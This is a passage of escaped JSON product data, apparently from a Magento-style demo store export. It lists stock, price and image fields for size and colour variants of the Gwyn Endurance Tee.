Cotton|Spandex,pattern=Solid,climate=Indoor|Warm,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS12-XS-Blue,size=XS,color=Blue|sku=WS12-XS-Orange,size=XS,color=Orange|sku=WS12-XS-Purple,size=XS,color=Purple|sku=WS12-S-Blue,size=S,color=Blue|sku=WS12-S-Orange,size=S,color=Orange|sku=WS12-S-Purple,size=S,color=Purple|sku=WS12-M-Blue,size=M,color=Blue|sku=WS12-M-Orange,size=M,color=Orange|sku=WS12-M-Purple,size=M,color=Purple|sku=WS12-L-Blue,size=L,color=Blue|sku=WS12-L-Orange,size=L,color=Orange|sku=WS12-L-Purple,size=L,color=Purple|sku=WS12-XL-Blue,size=XL,color=Blue|sku=WS12-XL-Orange,size=XL,color=Orange|sku=WS12-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Hemp|Organic Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1510\":{\"sku\":\"WS01-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XS-Black\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1511\":{\"sku\":\"WS01-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XS-Green\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1512\":{\"sku\":\"WS01-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-XS-Yellow\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1513\":{\"sku\":\"WS01-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-S-Black\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1514\":{\"sku\":\"WS01-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-S-Green\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1515\":{\"sku\":\"WS01-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-S-Yellow\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1516\":{\"sku\":\"WS01-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-M-Black\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1517\":{\"sku\":\"WS01-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-M-Green\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwyn-endurance-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1518\":{\"sku\":\"WS01-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwyn Endurance Tee-M-Yellow\",\"description\":\"<p>When the miles add up, comfort is crucial. The short-sleeve Gwyn Endurance Tee is designed with an ultra-lightweight blend of breathable fabrics to help you tackle your training. Female-specific seams and a sporty v-neckline offer subtle style.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 